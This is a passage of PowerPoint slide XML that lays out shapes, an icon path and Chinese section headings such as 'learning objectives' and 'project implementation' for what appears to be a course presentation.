                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
